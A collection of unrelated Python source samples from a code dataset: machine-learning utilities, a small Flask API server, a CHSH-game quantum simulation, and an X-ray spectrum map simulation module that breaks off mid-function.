isoforms: Dict[uuid.UUID, Isoform] = field(default_factory=dict)
rnas: Dict[uuid.UUID, RNA] = field(default_factory=dict)
genes: Dict[uuid.UUID, Gene] = field(default_factory=dict)
stats: Dict[str, int] = field(default_factory=lambda: defaultdict(int))
errors: List[str] = field(default_factory=list)
protein_id_to_isoform: Optional[Mapping[str, uuid.UUID]] = None
isoform_to_duplicates: Optional[Mapping[uuid.UUID, List[uuid.UUID]]] = None
| StarcoderdataPython |
3260185 | <gh_stars>1-10
# MIT License
#
# Copyright (c) 2019 <NAME>, <NAME>, <NAME>, <NAME>, <NAME>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from os.path import isfile
from shlex import split
from subprocess import Popen, PIPE, STDOUT
from sys import stdout
from sklearn.decomposition import PCA, TruncatedSVD
from sklearn.random_projection import johnson_lindenstrauss_min_dim, SparseRandomProjection
from umap import UMAP
from dpemu.utils import get_project_root
def run_ml_module_using_cli(cline, show_stdout=True):
"""Runs an external ML model using its CLI.
Args:
cline: Command line used to call the external ML model.
show_stdout: True to print the stdout of the external ML model.
Returns:
A string containing the stdout of the external ML model.
"""
if show_stdout:
proc = Popen(split(cline), bufsize=0, stdout=PIPE, stderr=STDOUT, universal_newlines=True,
cwd=get_project_root())
else:
proc = Popen(split(cline), bufsize=0, stdout=PIPE, universal_newlines=True, cwd=get_project_root())
chars = []
while True:
char = proc.stdout.read(1)
if not char and proc.poll() is not None:
print()
break
if char and show_stdout:
stdout.write(char)
stdout.flush()
if char:
chars.append(char)
return "".join(chars)
def reduce_dimensions(data, random_state, target_dim=2):
"""
Reduces the dimensionality of the data using UMAP for lower dimensions, PCA for higher dimensions and possibly
even random projections if the number of dimension is over the limit given by the Johnson–Lindenstrauss lemma. Works
for NumPy arrays.
Args:
data: The input data.
random_state: Random state to generate reproducible results.
target_dim: The targeted dimension.
Returns:
Lower dimension representation of the data.
"""
jl_limit = johnson_lindenstrauss_min_dim(n_samples=data.shape[0], eps=.3)
pca_limit = 30
if data.shape[1] > jl_limit and data.shape[1] > pca_limit:
data = SparseRandomProjection(n_components=jl_limit, random_state=random_state).fit_transform(data)
if data.shape[1] > pca_limit:
data = PCA(n_components=pca_limit, random_state=random_state).fit_transform(data)
return UMAP(n_components=target_dim, n_neighbors=30, min_dist=0.0, random_state=random_state).fit_transform(data)
def reduce_dimensions_sparse(data, random_state, target_dim=2):
"""
Reduces the dimensionality of the data using UMAP for lower dimensions and TruncatedSVD for higher dimensions. Works
for SciPy sparse matrices.
Args:
data: The input data.
random_state: Random state to generate reproducible results.
target_dim: The targeted dimension.
Returns:
Lower dimension representation of the data.
"""
svd_limit = 30
if data.shape[1] > svd_limit:
data = TruncatedSVD(n_components=svd_limit, random_state=random_state).fit_transform(data)
return UMAP(n_components=target_dim, random_state=random_state).fit_transform(data)
def load_yolov3():
"""Loads the custom weights and cfg for the YOLOv3 model.
Returns:
Paths to YOLOv3 weights and cfg file.
"""
path_to_yolov3_weights = f"{get_project_root()}/tmp/yolov3-spp_best.weights"
if not isfile(path_to_yolov3_weights):
Popen(["./scripts/get_yolov3.sh"], cwd=get_project_root()).wait()
return path_to_yolov3_weights, f"{get_project_root()}/tmp/yolov3-spp.cfg"
| StarcoderdataPython |
56070 | """
python app/app.py -> http://0.0.0.0:8080/
"""
from app.models.database import db, ma
from flask_session import Session
from flask_api import FlaskAPI, status
from flask_assets import Environment
from flask_cors import CORS
from flask import jsonify
import logging
import time
from routes.main_db import main_db_bp
from routes.secondary_db import secondary_db_bp
app = FlaskAPI(__name__)
app.logger.setLevel(logging.INFO)
CORS(app, resources=r'/api/*', supports_credentials=True)
app.config.from_object('config')
Environment(app)
db.init_app(app)
ma.init_app(app)
Session(app)
app.register_blueprint(main_db_bp)
app.register_blueprint(secondary_db_bp)
# Server status
@app.route("/")
def server_status():
# Across config.py, app.py, ../setup.py
return jsonify({'status': 'ONLINE', 'version': '0.1'}), status.HTTP_200_OK
# For timeout testing
@app.route("/timeout_test/<seconds>")
def timeout_test(seconds):
time.sleep(int(seconds))
return jsonify({'timeout_test': f'{seconds} seconds'}), status.HTTP_200_OK
# Error handling routes (Can't use blueprints)
@app.errorhandler(400)
def bad_request(_):
return jsonify({'error': 'Bad request'}), status.HTTP_400_BAD_REQUEST
@app.errorhandler(404)
def not_found(_):
return jsonify({'error': 'Not found'}), status.HTTP_404_NOT_FOUND
@app.errorhandler(405)
def not_allowed(_):
return jsonify({'error': 'Method not allowed'}), status.HTTP_405_METHOD_NOT_ALLOWED
if __name__ == "__main__":
app.run(debug=False, host='0.0.0.0', port=8080)
| StarcoderdataPython |
23819 | import random
from qlazy import QState
def classical_strategy(trials=1000):
win_cnt = 0
for _ in range(trials):
# random bits by Charlie (x,y)
x = random.randint(0,1)
y = random.randint(0,1)
# response by Alice (a)
a = 0
# response by Bob (b)
b = 0
# count up if win
if (x and y) == (a+b)%2:
win_cnt += 1
print("== result of classical strategy (trials:{0:d}) ==".format(trials))
print("* win prob. = ", win_cnt/trials)
def quantum_strategy(trials=1000):
win_cnt = 0
for _ in range(trials):
# random bits by Charlie (x,y)
x = random.randint(0,1)
y = random.randint(0,1)
# make entangled 2 qubits (one for Alice and another for Bob)
qs = QState(2).h(0).cx(0,1)
# response by Alice (a)
if x == 0:
# measurement of Z-basis (= Ry(0.0)-basis)
sa = qs.m([0], shots=1, angle=0.0, phase=0.0).lst
if sa == 0:
a = 0
else:
a = 1
else:
# measurement of X-basis (or Ry(0.5*PI)-basis)
sa = qs.mx([0], shots=1).lst
# sa = qs.m([0], shots=1, angle=0.5, phase=0.0).lst
if sa == 0:
a = 0
else:
a = 1
# response by Bob (b)
if y == 0:
# measurement of Ry(0.25*PI)-basis
sb = qs.m([1], shots=1, angle=0.25, phase=0.0).lst
if sb == 0:
b = 0
else:
b = 1
else:
# measurement of Ry(-0.25*PI)-basis
sb = qs.m([1], shots=1, angle=-0.25, phase=0.0).lst
if sb == 0:
b = 0
else:
b = 1
# count up if win
if (x and y) == (a+b)%2:
win_cnt += 1
print("== result of quantum strategy (trials:{0:d}) ==".format(trials))
print("* win prob. = ", win_cnt/trials)
if __name__ == '__main__':
classical_strategy()
quantum_strategy()
| StarcoderdataPython |
3204611 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
.. py:currentmodule:: create_map
:synopsis: Create map from the mcxray simulation.
.. moduleauthor:: <NAME> <<EMAIL>>
Create map from the mcxray simulation.
"""
###############################################################################
# Copyright 2017 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# Standard library modules.
import logging
import math
import os.path
# Third party modules.
import h5py
import matplotlib.pyplot as plt
from scipy.constants import e
from numpy.random import normal, poisson
import numpy as np
# Local modules.
from pymcxray.mcxray import HDF5_PARAMETERS
# Project modules.
from xrayspectrummodeling.map.simulation_data import SimulationData
from xrayspectrummodeling import get_current_module_path
# Globals and constants variables.
MAP_WIDTH = "width"
MAP_HEIGHT = "height"
MAP_DEPTH = "depth"
MAP_DATA_TYPE = "data type"
MAP_PIXEL_TIME_s = "pixel time (s)"
MAP_CURRENT_nA = "current nA"
MAP_NOMINAL_NUMBER_ELECTRONS = "nominal number electrons"
MAP_SOLID_ANGLE_rad = "solid angle (rad)"
MAP_DETECTOR_NOISE_eV = "detector noise (eV)"
MAP_DETECTOR_RESOLUTION_AT_MN_eV = "detector resolution at Mn Ka (eV)"
MAP_COMMENTS = "comments"
MAP_DATA_WIDTH_nm = "widths (nm)"
MAP_DATA_HEIGHT_nm = "heights (nm)"
MAP_DATA_DEPTH_keV = "energies (keV)"
class DetectorFunction(object):
def __init__(self, electronic_noise_eV, fano_factor=0.125):
self._electronic_noise_eV = electronic_noise_eV
self._fano_factor = fano_factor
self._electron_hole_pair_eV = 3.8
self._numeric_factor = 2.0 * math.sqrt(2.0 * math.log(2.0))
def getFwhm_eV(self, xrayEnergy_eV):
term1 = self._electronic_noise_eV ** 2
term2 = self._numeric_factor * self._numeric_factor * self._electron_hole_pair_eV * self._fano_factor * xrayEnergy_eV
fwhm_eV = math.sqrt(term1 + term2)
return fwhm_eV
def get_fwhms_eV(self, xray_energies_eV):
term1 = self._electronic_noise_eV ** 2
term2 = self._numeric_factor * self._numeric_factor * self._electron_hole_pair_eV * self._fano_factor * xray_energies_eV
fwhms_eV = np.sqrt(term1 + term2)
return fwhms_eV
def getSigma_keV(self, xrayEnergy_keV):
xrayEnergy_eV = xrayEnergy_keV*1.0e3
fwhm_eV = self.getFwhm_eV(xrayEnergy_eV)
fwhm_keV = fwhm_eV/1.0e3
sigma_keV = fwhm_keV/self._numeric_factor
return sigma_keV
def get_sigmas_keV(self, xray_energies_keV):
xray_energies_eV = xray_energies_keV*1.0e3
fwhms_eV = self.get_fwhms_eV(xray_energies_eV)
fwhms_keV = fwhms_eV/1.0e3
sigmas_keV = fwhms_keV/self._numeric_factor
return sigmas_keV
def getElectronicNoise_eV(self):
return self._electronic_noise_eV
def get_efficiency():
file_path = get_current_module_path(__file__, r"../../data/mcxray_XrayDetectorEfficiency.csv")
data = np.loadtxt(file_path, float, delimiter=',',)
return data
def create_test_map(data_path, figure=True):
compositions = {1: "Fe-1wt%Co", 2: "Fe-2wt%Co", 3: "Fe-5wt%Co",
4: "Co-1wt%Ni", 5: "Co-2wt%Ni", 6: "Co-5wt%Ni",
7: "Fe-1wt%Co-49.5Ni", 8: "Fe-2wt%Co-49.0Ni", 9: "Fe-5wt%Co-47.5Ni"}
width = 3
height = 3
depth = 1024
data_type = np.int32
current_nA = 1.0
solid_angle_rad = 0.00140035
detector_noise_eV = 50
efficiency = get_efficiency()
xs_nm = np.linspace(-5.0e3, 5.0e3, width)
hdf5_file_path = os.path.join(data_path, r"SimulationMapsMM2017_3x3.hdf5")
print(hdf5_file_path)
with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
simulations_group = hdf5_file["simulations"]
print(simulations_group.name)
times_s = [0.05, 0.1, 0.5, 1.0, 5.0, 10.0]
hdf5_file_out_path = os.path.join(data_path, r"test_maps.hdf5")
with h5py.File(hdf5_file_out_path, 'w', driver='core') as hdf5_file:
maps_group = hdf5_file.require_group("maps")
for time_s in times_s:
_create_map(compositions, current_nA, data_type, depth, detector_noise_eV, efficiency, figure,
hdf5_file_out_path, height, maps_group, simulations_group, solid_angle_rad, time_s, width,
xs_nm)
def create_map_mm2017_abstract(data_path, figure=False):
compositions = {1: "Fe-1wt%Co", 2: "Fe-2wt%Co", 3: "Fe-5wt%Co",
4: "Co-1wt%Ni", 5: "Co-2wt%Ni", 6: "Co-5wt%Ni",
7: "Fe-1wt%Co-49.5Ni", 8: "Fe-2wt%Co-49.0Ni", 9: "Fe-5wt%Co-47.5Ni"}
width = 128
height = 128
depth = 1024
data_type = np.int32
current_nA = 1.0
solid_angle_rad = 0.00140035
detector_noise_eV = 50
efficiency = get_efficiency()
xs_nm = np.linspace(-5.0e3, 5.0e3, width)
hdf5_file_path = os.path.join(data_path, r"SimulationMapsMM2017.hdf5")
with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
simulations_group = hdf5_file["simulations"]
times_s = [0.05, 0.1, 0.5, 1.0, 5.0, 10.0]
hdf5_file_out_path = os.path.join(data_path, r"map_mm2017_abstract.hdf5")
with h5py.File(hdf5_file_out_path, 'w', driver='core') as hdf5_file:
maps_group = hdf5_file.require_group("maps")
for time_s in times_s:
_create_map(compositions, current_nA, data_type, depth, detector_noise_eV, efficiency, figure,
hdf5_file_out_path, height, maps_group, simulations_group, solid_angle_rad, time_s, width,
xs_nm)
def export_raw_test_map(data_path):
from pySpectrumFileFormat.Bruker.MapRaw.ParametersFile import ParametersFile, BYTE_ORDER_LITTLE_ENDIAN, RECORED_BY_VECTOR, DATA_TYPE_SIGNED
hdf5_file_out_path = os.path.join(data_path, r"analyzes\test_maps.hdf5")
with h5py.File(hdf5_file_out_path, 'r', driver='core') as hdf5_file:
maps_group = hdf5_file["maps"]
for name, group in maps_group.items():
if str(group.name).startswith("/maps/map"):
map_data_set = group
logging.info(group.name)
logging.info(name)
parameters_file = ParametersFile()
parameters_file.width = map_data_set.attrs[MAP_WIDTH]
parameters_file.height = map_data_set.attrs[MAP_HEIGHT]
parameters_file.depth = map_data_set.attrs[MAP_DEPTH]
parameters_file.offset = 0
parameters_file.dataLength_B = 4
parameters_file.dataType = DATA_TYPE_SIGNED
parameters_file.byteOrder = BYTE_ORDER_LITTLE_ENDIAN
parameters_file.recordBy = RECORED_BY_VECTOR
parameters_file.energy_keV = 30.0
parameters_file.pixel_size_nm = 0.0
base_file_out_path = hdf5_file_out_path[:-5] + "_" + name.replace(' ', '_')
parameters_file.write(base_file_out_path + ".rpl")
shape = (parameters_file.height, parameters_file.width, parameters_file.depth)
fp = np.memmap(base_file_out_path + ".raw", dtype=np.int32, mode='w+', shape=shape)
fp[:] = map_data_set[:]
del fp
def read_raw_test_map(data_path):
from pySpectrumFileFormat.Bruker.MapRaw.MapRawFormat import MapRawFormat
file_path = os.path.join(data_path, r"test_maps_map_1000000_us.raw")
map_raw = MapRawFormat(file_path)
channels, datacube = map_raw.getDataCube()
plt.figure()
plt.plot(channels, datacube[1,1,:])
x_data, y_data = map_raw.getSpectrum(1, 1)
plt.figure()
plt.plot(x_data, y_data)
x_data, y_data = map_raw.getSumSpectrum()
plt.figure()
plt.plot(x_data, y_data)
image = map_raw.getTotalIntensityImage()
plt.figure()
plt.imshow(image, cmap="gray")
roi = (210, 225)
image = map_raw.getRoiIntensityImage(roi)
plt.figure()
plt.imshow(image, cmap="gray")
def export_raw_map_mm2017_abstract(data_path):
from pySpectrumFileFormat.Bruker.MapRaw.ParametersFile import ParametersFile, BYTE_ORDER_LITTLE_ENDIAN, RECORED_BY_VECTOR, DATA_TYPE_SIGNED
hdf5_file_out_path = os.path.join(data_path, r"map_mm2017_abstract.hdf5")
with h5py.File(hdf5_file_out_path, 'r', driver='core') as hdf5_file:
maps_group = hdf5_file["maps"]
for name, group in maps_group.items():
if str(group.name).startswith("/maps/map"):
map_data_set = group
logging.info(group.name)
logging.info(name)
parameters_file = ParametersFile()
parameters_file.width = map_data_set.attrs[MAP_WIDTH]
parameters_file.height = map_data_set.attrs[MAP_HEIGHT]
parameters_file.depth = map_data_set.attrs[MAP_DEPTH]
parameters_file.offset = 0
parameters_file.dataLength_B = 4
parameters_file.dataType = DATA_TYPE_SIGNED
parameters_file.byteOrder = BYTE_ORDER_LITTLE_ENDIAN
parameters_file.recordBy = RECORED_BY_VECTOR
parameters_file.energy_keV = 30.0
parameters_file.pixel_size_nm = 0.0
base_file_out_path = hdf5_file_out_path[:-5] + "_" + name.replace(' ', '_')
parameters_file.write(base_file_out_path + ".rpl")
shape = (parameters_file.height, parameters_file.width, parameters_file.depth)
fp = np.memmap(base_file_out_path + ".raw", dtype=np.int32, mode='w+', shape=shape)
fp[:] = map_data_set[:]
del fp
def read_raw_map_mm2017_abstract(data_path):
from pySpectrumFileFormat.Bruker.MapRaw.MapRawFormat import MapRawFormat
file_path = os.path.join(data_path, r"map_mm2017_abstract_map_10000000_us.raw")
map_raw = MapRawFormat(file_path)
channels, datacube = map_raw.getDataCube()
print(datacube.shape)
plt.figure()
plt.title("All regions")
plt.semilogy(channels, datacube.sum(axis=(0,1)))
plt.figure()
plt.title("Region 1")
plt.semilogy(channels, datacube[0:32, 0:32, :].sum(axis=(0,1)))
plt.figure()
plt.title("Region 2")
plt.semilogy(channels, datacube[32:32*3, 0:32, :].sum(axis=(0,1)))
plt.figure()
plt.title("Region 3")
plt.semilogy(channels, datacube[32*3:, 0:32, :].sum(axis=(0,1)))
plt.figure()
plt.plot(channels, datacube[1,1,:])
plt.close()
x_data, y_data = map_raw.getSpectrum(1, 1)
plt.figure()
plt.plot(x_data, y_data)
plt.close()
x_data, y_data = map_raw.getSumSpectrum()
plt.figure()
plt.plot(x_data, y_data)
plt.close()
image = map_raw.getTotalIntensityImage()
plt.figure()
plt.imshow(image, cmap="gray")
plt.close()
roi = (225, 235)
image = map_raw.getRoiIntensityImage(roi)
plt.figure()
plt.imshow(image, cmap="gray")
plt.close()
plt.figure()
plt.plot(x_data, np.linspace(0.0, 30.0, len(x_data)))
plt.close()
def bse_image_mm2017(data_path):
hdf5_file_path = os.path.join(data_path, r"SimulationMapsMM2017.hdf5")
with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
simulations_group = hdf5_file["simulations"]
width = 128
height = width
data_type = np.float
xs_nm = np.linspace(-5.0e3, 5.0e3, width)
shape = (height, width)
data = np.zeros(shape, dtype=data_type)
for group in simulations_group.values():
try:
index_x = np.where(xs_nm == group.attrs["beamPosition"][0])[0][0]
index_y = np.where(xs_nm == group.attrs["beamPosition"][1])[0][0]
bse = group["ElectronResults"].attrs["Backscattering coefficient"]
data[index_y, index_x] = bse
except IndexError as message:
logging.error(message)
logging.info(group.name)
plt.figure()
plt.imshow(data, cmap='gray')
plt.xticks([])
plt.yticks([])
figure_file_path = os.path.join(data_path, "bse_image.png")
plt.savefig(figure_file_path)
# plt.close()
def _create_electron_maps(data_path, hdf5_file_path, positions):
symbols = ['Fe', 'Co', 'Ni']
simulation_data = SimulationData(hdf5_file_path, positions, symbols)
# BSE map
bse_map = simulation_data.get_bse_map()
plt.figure()
plt.imshow(bse_map, cmap='gray')
plt.xticks([])
plt.yticks([])
figure_file_path = os.path.join(data_path, "figures", "bse_image.png")
plt.savefig(figure_file_path)
# plt.close()
# TE map
te_map = simulation_data.get_te_map()
plt.figure()
plt.imshow(te_map, cmap='gray')
plt.xticks([])
plt.yticks([])
figure_file_path = os.path.join(data_path, "figures", "te_image.png")
plt.savefig(figure_file_path)
plt.close()
# skirted electron map
se_map = simulation_data.get_skirted_electron_map()
plt.figure()
plt.imshow(se_map, cmap='gray')
plt.xticks([])
plt.yticks([])
figure_file_path = os.path.join(data_path, "figures", "se_image.png")
plt.savefig(figure_file_path)
plt.close()
# TE corrected map
te_map = simulation_data.get_te_map()
plt.figure()
plt.imshow(te_map+se_map, cmap='gray')
plt.xticks([])
plt.yticks([])
figure_file_path = os.path.join(data_path, "figures", "transmitted_electron_image.png")
plt.savefig(figure_file_path)
# plt.close()
def _create_intensity_maps(data_path, hdf5_file_path, positions):
symbols = ['Fe', 'Co']
simulation_data = SimulationData(hdf5_file_path, positions, symbols)
intensity_data = {}
for symbol in symbols:
intensity_data[symbol] = simulation_data.get_intensity_data(symbol)
# Ka map
intensity_map = np.sum(intensity_data[symbol][:, :, :, 0:1, 1], axis=(2,3))
logging.debug(intensity_data[symbol].shape)
logging.debug(intensity_map.shape)
try:
plt.figure()
plt.title("{} Ka generated".format(symbol))
plt.imshow(intensity_map, cmap='gray')
plt.colorbar()
plt.xticks([])
plt.yticks([])
figure_file_path = os.path.join(data_path, "figures", "intensity_{}_ka_generated_image.png".format(symbol))
plt.savefig(figure_file_path)
plt.close()
except ValueError as message:
logging.error(message)
logging.info(symbol)
intensity_map = np.sum(intensity_data[symbol][:, :, :, 0:1, 3], axis=(2, 3))
logging.info(intensity_data[symbol].shape)
logging.info(intensity_map.shape)
try:
plt.figure()
plt.title("{} Ka emitted".format(symbol))
plt.imshow(intensity_map, cmap='gray')
plt.colorbar()
plt.xticks([])
plt.yticks([])
figure_file_path = os.path.join(data_path, "figures", "intensity_{}_ka_emitted_image.png".format(symbol))
plt.savefig(figure_file_path)
plt.close()
except ValueError as message:
logging.error(message)
logging.info(symbol)
intensity_data = {}
for symbol in symbols:
intensity_data[symbol] = simulation_data.get_intensity_data(symbol)
for symbol in symbols:
# Ka f-ratio map
intensity_element_map = np.sum(intensity_data[symbol][:, :, :, 0:1, 3], axis=(2, 3))
intensity_total_map = np.zeros_like(intensity_element_map)
for symbol_total in symbols:
intensity_total_map += np.sum(intensity_data[symbol_total][:, :, :, 0:1, 3], axis=(2, 3))
fratio_element_map = intensity_element_map / intensity_total_map
try:
plt.figure()
plt.title("{} Ka emitted".format(symbol))
# plt.imshow(fratio_element_map, cmap='gray', norm=colors.LogNorm(vmin=0.001, vmax=1.0))
plt.imshow(fratio_element_map, cmap='gray', vmin=0.0, vmax=1.0)
plt.colorbar()
plt.xticks([])
plt.yticks([])
figure_file_path = os.path.join(data_path, "figures", "fratio_{}_ka_emitted_image.png".format(symbol))
plt.savefig(figure_file_path)
# plt.close()
except ValueError as message:
logging.error(message)
logging.info(symbol)
def _create_spectra(data_path, hdf5_file_path, positions):
symbols = ['Fe', 'Co', 'Ni']
simulation_data = SimulationData(hdf5_file_path, positions, symbols)
for position in positions.get_list()[0:1]:
energies_keV, spectrum = simulation_data.get_emitted_spectrum(position)
plt.figure()
title = "{0} ({1}, {2})".format("Emitted", position[0], position[1])
plt.title(title)
plt.semilogy(energies_keV, spectrum)
plt.xlabel("Energy (keV)")
plt.ylabel("Intensity (1/keV/e-/sr)")
file_name = "{0}_{1}_{2}.png".format("Spectrum_Emitted", position[0], position[1])
figure_file_path = os.path.join(data_path, "figures", file_name)
plt.savefig(figure_file_path)
plt.close()
energies_keV, spectrum = simulation_data.get_detected_spectrum(position)
plt.figure()
title = "{0} ({1}, {2})".format("Detected", position[0], position[1])
plt.title(title)
plt.semilogy(energies_keV, spectrum)
plt.xlabel("Energy (keV)")
plt.ylabel("Intensity (photons)")
plt.ylim(ymin=1)
file_name = "{0}_{1}_{2}.png".format("Spectrum_Detected", position[0], position[1])
figure_file_path = os.path.join(data_path, "figures", file_name)
plt.savefig(figure_file_path)
plt.close()
# Calculated detected
current_nA = 1.0
solid_angle_rad = 0.00140035
detector_noise_eV = 50
efficiency = get_efficiency()
time_s = 100.0
depth = 128
nominal_number_electrons, number_electrons = _compute_number_electrons(current_nA, time_s)
logging.debug("{} {}".format(nominal_number_electrons, number_electrons))
energy_data, intensity_data_1_ekeVsr = simulation_data.get_emitted_spectrum(position)
intensity_efficiency_data_1_ekeVsr = intensity_data_1_ekeVsr * np.interp(energy_data, efficiency[:, 0],
efficiency[:, 1])
plt.figure()
title = "{} ({}, {})".format("Emitted * efficiency", position[0], position[1])
plt.title(title)
plt.semilogy(energy_data, intensity_data_1_ekeVsr, '.')
plt.semilogy(energy_data, intensity_efficiency_data_1_ekeVsr, '.')
plt.xlabel("Energy (keV)")
plt.ylabel("Intensity (1/keV/e-/sr)")
file_name = "{0}_{1}_{2}.png".format("Spectrum_Emitted_Efficiency", position[0], position[1])
figure_file_path = os.path.join(data_path, "figures", file_name)
plt.savefig(figure_file_path)
plt.close()
delta_energy_keV = energy_data[1] - energy_data[0]
intensity_data = intensity_efficiency_data_1_ekeVsr * number_electrons * solid_angle_rad * delta_energy_keV
plt.figure()
title = "{} ({}, {}), t = {} s".format("Emitted counts", position[0], position[1], time_s)
plt.title(title)
plt.semilogy(energy_data, intensity_data, '.')
plt.xlabel("Energy (keV)")
plt.ylabel("Intensity (photons)")
plt.ylim(ymin=1)
file_name = "{}_{}_{}_t{}s.png".format("Spectrum_Emitted_Counts", position[0], position[1], time_s)
figure_file_path = os.path.join(data_path, "figures", file_name)
plt.savefig(figure_file_path)
plt.close()
energy_edges_keV = np.linspace(0.0, 30.0, depth + 1)
energies_keV = np.linspace(0.0, 30.0, depth)
counts_data = change_energy_scale2(energy_data, intensity_data, energy_edges_keV)
plt.figure()
title = "{} ({}, {}), t = {} s".format("Emitted counts", position[0], position[1], time_s)
plt.title(title)
plt.semilogy(energy_data, intensity_data, '-')
plt.semilogy(energies_keV, counts_data, '.')
plt.xlabel("Energy (keV)")
plt.ylabel("Intensity (photons)")
plt.ylim(ymin=1)
file_name = "{}_{}_{}_t{}s.png".format("Spectrum_Emitted_Counts", position[0], position[1], time_s)
figure_file_path = os.path.join(data_path, "figures", file_name)
plt.savefig(figure_file_path)
# plt.close()
detector = DetectorFunction(detector_noise_eV)
sigmas_keV = detector.get_sigmas_keV(energies_keV)
fwhms_eV = detector.get_fwhms_eV(energies_keV*1.0e3)
plt.figure()
plt.title("Detector")
plt.plot(energies_keV, sigmas_keV)
plt.plot(energies_keV, fwhms_eV/1.0e3)
plt.xlabel("Energy (keV)")
plt.ylabel("Sigma (keV)")
# plt.ylim(ymin=1)
file_name = "{}_{}_{}_t{}s.png".format("Detector", position[0], position[1], time_s)
figure_file_path = os.path.join(data_path, "figures", file_name)
plt.savefig(figure_file_path)
plt.close()
plt.figure()
title = "{} ({}, {}), t = {} s".format("Detected", position[0], position[1], time_s)
plt.title(title)
mean_intensity = np.zeros_like(energies_keV)
number_repetitions = 50
for repetition in range(number_repetitions):
xrays = _compute_xrays(detector_noise_eV, energies_keV, counts_data)
counts, _bin_edges = np.histogram(xrays, bins=energy_edges_keV)
mean_intensity += counts
# plt.semilogy(energies_keV, counts, label=repetition)
logging.debug("{:d} {:d} {:d}".format(int(np.sum(counts_data)), len(xrays), int(np.sum(counts_data)-len(xrays))))
logging.debug("{:d} {:d} {:d}".format(len(xrays), int(np.sum(counts)) , len(xrays) - int(np.sum(counts))))
mean_intensity /= number_repetitions
plt.semilogy(energies_keV, counts_data)
plt.semilogy(energies_keV, mean_intensity)
plt.xlabel("Energy (keV)")
plt.ylabel("Intensity (photons)")
plt.ylim(ymin=1)
# plt.legend()
file_name = "{}_{}_{}_t{}s.png".format("Spectrum_Detected", position[0], position[1], time_s)
figure_file_path = os.path.join(data_path, "figures", file_name)
plt.savefig(figure_file_path)
# plt.close()
def compute_histogram(energy_data, intensity_data, energy_edges_keV):
xrays = []
for energy_keV, intensity in zip(energy_data, intensity_data):
xrays.extend(np.full((int(round(intensity))), energy_keV).tolist())
counts_data, _bin_edges = np.histogram(xrays, bins=energy_edges_keV)
logging.info("{:d} {:d} {:d}".format(int(np.sum(intensity_data)), len(xrays), int(np.sum(intensity_data) - len(xrays))))
return counts_data
def change_energy_scale(energy_data, intensity_data, energy_edges_keV):
counts_data = np.zeros((len(energy_edges_keV)-1), dtype=np.float)
for energy_keV, intensity in zip(energy_data, intensity_data):
for i in range(len(energy_edges_keV)-1):
if energy_keV >= energy_edges_keV[i] and energy_keV < energy_edges_keV[i+1]:
counts_data[i] += intensity
return counts_data
def change_energy_scale2(energy_data, intensity_data, energy_edges_keV):
counts_data = np.zeros((len(energy_edges_keV)-1), dtype=np.float)
for energy_keV, intensity in zip(energy_data[:-1], intensity_data[:-1]):
i = np.searchsorted(energy_edges_keV, energy_keV, side="right")-1
counts_data[i] += intensity
return counts_data
def _create_spectra_maps(data_path, hdf5_file_path, hdf5_file_out_path, positions):
logging.info("_create_spectra_maps")
depth = 1024
data_type = np.int32
current_nA = 1.0
solid_angle_rad = 0.00140035
detector_noise_eV = 50
efficiency = get_efficiency()
with h5py.File(hdf5_file_path, 'r', driver='core') as hdf5_file:
simulations_group = hdf5_file["simulations"]
times_s = [0.005, 0.01, 0.05, 0.1, 0.5, 1.0, 5.0, 10.0, 50.0, 100.0, 500.0, 1000.0]
times_s = [0.1]
with h5py.File(hdf5_file_out_path, 'a', driver='core') as hdf5_file:
maps_group = hdf5_file.require_group("maps")
for time_s in times_s:
_create_map(current_nA, data_type, depth, detector_noise_eV, efficiency, maps_group,
simulations_group, solid_angle_rad, time_s, positions)
def _create_map(current_nA, data_type, depth, detector_noise_eV, efficiency, maps_group, simulations_group,
solid_angle_rad, time_s, positions):
logging.info("_create_map {}".format(time_s))
time_us = time_s * 1.0e6
map_name = "map %i us" % (time_us)
if map_name in maps_group:
logging.info("Map already exist skip it: {}".format(map_name))
return
shape = (positions.y_pixels, positions.x_pixels, depth)
data = np.zeros(shape, dtype=data_type)
for group in simulations_group.values():
if not group.name.endswith(HDF5_PARAMETERS):
try:
index_x = np.where(positions.xs_nm == group.attrs["beamPosition"][0])[0][0]
index_y = np.where(positions.ys_nm == group.attrs["beamPosition"][1])[0][0]
nominal_number_electrons, number_electrons = _compute_number_electrons(current_nA, time_s)
delta_energy_keV, energy_data, intensity_data = _compute_intensity(efficiency, group, number_electrons,
solid_angle_rad, depth)
xrays = _compute_xrays(detector_noise_eV, energy_data, intensity_data)
counts, energies_keV = _compute_counts(data, depth, index_x, index_y, xrays)
except IndexError:
pass
_write_map(current_nA, data, data_type, depth, detector_noise_eV, energies_keV, maps_group,
nominal_number_electrons, shape, solid_angle_rad, time_s, positions)
def _write_map(current_nA, data, data_type, depth, detector_noise_eV, energies_keV, maps_group,
nominal_number_electrons, shape, solid_angle_rad, time_s, positions):
logging.info("_write_map {}".format(time_s))
detector = DetectorFunction(detector_noise_eV)
time_us = time_s * 1.0e6
